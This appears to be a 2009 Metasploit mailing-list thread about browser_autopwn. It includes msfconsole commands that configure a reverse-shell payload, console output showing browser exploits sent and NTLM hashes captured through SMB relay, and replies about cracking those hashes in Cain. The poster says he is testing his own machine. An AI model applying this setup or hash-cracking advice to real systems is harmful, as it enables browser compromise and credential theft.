IE/FF Pawnage.

[wfdawson at bellsouth.net (wfdawson at bellsouth.net)]

Hi all,

Please pardon my apparent ignorance, but can someone point me to a how-to or suitable hint-age on translating the 
49-character LMHASH and NTHASH output in the message below into something that Cain will accept?

Thanks in advance!
 -------------- Original message from egypt at metasploit.com: --------------


> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Browser autopwn hasn't been updated to use the new IE7 XML
> vulnerability yet; what you are seeing is MS06-071.  The Firefox
> exploits included with Metasploit are all relatively old so an
> installation newer than 1.5 would be unexploitable.  I'm not sure why
> so many smb_relay attempts happened in this case but those hashes can
> be put right into Cain for cracking.
>
> The reason browser autopwn didn't try other exploits is the whole
> point of browser autopwn:  it uses javascript to determine what
> exploits the target might be vulnerable to.
>
> Hope this helped.
> egypt
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.7 (GNU/Linux)
>
> iD8DBQFJYFw8ABHabZqEWJ0RAjMDAJ4xtdTAzt/0Qr7N5m5Yumplh2TQ2ACdFdyn
> 08qRyxk4ZEX0xDBRwYuT2+Q=
> =ifdF
> -----END PGP SIGNATURE-----
>
> On Sat, Jan 3, 2009 at 1:32 PM, Richard Miles
>  wrote:
> > Hi
> >
> > I'm testing browser_autopwn, I updated metasploit with SVN and basicly
> > I used this commands:
> >
> > msf> use auxiliary/server/browser_autopwn
> > msf> setg AUTOPWN_HOST 10.1.1.2
> > AUTOPWN_HOST => 10.1.1.2
> > msf> setg AUTOPWN_PORT 8888
> > AUTOPWN_PORT => 8888
> > msf> setg AUTOPWN_URI /ads
> > AUTOPWN_URI => /ads
> > msf> set LHOST 10.1.1.2
> > LHOST => 10.1.1.2
> > msf> set LPORT 4500
> > LPORT => 4500
> > msf> set SRVPORT 8888
> > SRVPORT => 8888
> > msf> set URIPATH /ads
> > URIPATH => /ads
> > msf> set PAYLOAD windows/shell/reverse_tcp
> > msf> run
> >
> > I tried to exploit my IE 7.0.5730.13 FireFox 3.0.5, My FF I installed
> > more than 1 month and the IE I only installed IE7 and never updated
> > and it was unable to exploit.
> >
> > The output in msf console looks like this:
> >
> > msf auxiliary(browser_autopwn) >
> > [*] Request '/ads' from 10.1.1.2:2166
> > [*] Recording detection from User-Agent
> > [*] Browser claims to be MSIE 7.0, running on Windows XP
> > [*] Responding with exploits
> > [*] Received 10.1.1.2:2167 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2167 \
> > [*] Received 10.1.1.2:2167 HOME\Administrator
> > LMHASH:856c3a815783b659220ea52f71f53677cb50bb89038cd09e
> > NTHASH:d4c133a04a549e9746de954717cb3c7b82ce28859ab3d749 OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> > [*] Sending Access Denied to 10.1.1.2:2167 HOME\Administrator
> > [*] Received 10.1.1.2:2170 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2170 \
> > [*] Received 10.1.1.2:2170 HOME\Administrator
> > LMHASH:0e3464274565da1174376257ea92a3705d15b8f67a548aedd
> > NTHASH:4c5ba976581ae17674c2c4d41b3c9a7121764f98fc3e8575 OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> v> [*] Sending Access Denied to 10.1.1.2:2170 HOME\Administrator
> > [*] Received 10.1.1.2:2172 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2172 \
> > [*] Received 10.1.1.2:2172 HOME\Administrator
> > LMHASH:1ea66a6fb256fdec1c7ab9c4efd3fdda6f52d1f7157f6ba8b
> > NTHASH:a1f355fa0144e541351627cbf9750cd0c50c327d858cf15e OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> > [*] Sending Access Denied to 10.1.1.2:2172 HOME\Administrator
> > [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166...
> > [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2174...
> > [*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w'
> > from 10.1.1.2:2166
> > [*] Recording detection from JavaScript
> > [*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0
> > [*] Sending exploit HTML to 10.1.1.2:2166...
> > [*] Sending Internet Explorer XML Core Services HTTP Request Handling
> > to 10.1.1.2:2174...
> > [*] Request '/ads' from 10.1.1.2:2166
> > [*] Recording detection from User-Agent
> > [*] Browser claims to be MSIE 7.0, running on Windows XP
> > [*] Responding with exploits
> > [*] Received 10.1.1.2:2182 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2182 \
> > [*] Received 10.1.1.2:2182 HOME\Administrator
> > LMHASH:18f4dc5457ecec5995b3ac9a477acc7e74464cb82d2831a
> > NTHASH:ed2322d3695592c67bb59a5f5dcb7c947b0ade6034824394 OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> > [*] Sending Access Denied to 10.1.1.2:2182 HOME\Administrator
> > [*] Received 10.1.1.2:2184 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2184 \
> > [*] Received 10.1.1.2:2184 HOME\Administrator
> > LMHASH:d889289cd0d4d8637422d39510e48ea325d61de7ad4fc8b6
> > NTHASH:bc5888b4afe06c19118b0eb5f176535885dbe44eddc87f15 OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> > [*] Sending Access Denied to 10.1.1.2:2184 HOME\Administrator
> > [*] Received 10.1.1.2:2186 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> > Pack 2 2600 LM:Windows 2002 5.1
> > [*] Sending Access Denied to 10.1.1.2:2186 \
> > [*] Received 10.1.1.2:2186 HOME\Administrator
> > LMHASH:87f9d52ed9280f9a453f8b6827f277729ecab072253de369
> > NTHASH:39364816918e506ddf64c022061ef871886f7ab7124f5967 OS:Windows
> > 2002 Service Pack 2 2600 LM:Windows 2002 5.1
> > [*] Authenticating to 10.1.1.2 as HOME\Administrator...
> > [*] Failed to authenticate as HOME\Administrator...
> > [*] Sending Access Denied to 10.1.1.2:2186 HOME\Administrator
> > [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166...
> > [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2188...
> > [*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w'
> > from 10.1.1.2:2166
> > [*] Recording detection from JavaScript
> > [*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0
> > [*] Sending Internet Explorer XML Core Services HTTP Request Handling
> > to 10.1.1.2:2166...
> > [*] Sending exploit HTML to 10.1.1.2:2191...
> >
> > Why it only tested the XML flaw at IE ? By the way, for the time I do
> > not update, this exploit should have worked, not?
> >
> > The FF was inexploitable equally.
> >
> > Strange, it only gave 2 or 3 shots and stoped. I made something wrong?
> >
> > This machine is Win XP SP2 with Avast.
> >
> > Also I saw it output several times NTLM hashes from the box, using
> > smbrelay I believe, right?
> >
> > Well, why this hashes are all different all the time? Is it NTLM
> > challenge?  If yes, would not be good add the challenge at the output,
> > because at last we can try use it to brute-force the password of the
> > account.
> >
> > Thank you and have a happy new year.
> > _______________________________________________
> > http://spool.metasploit.com/mailman/listinfo/framework
> _______________________________________________
> http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090105/10aae7e2/attachment.htm>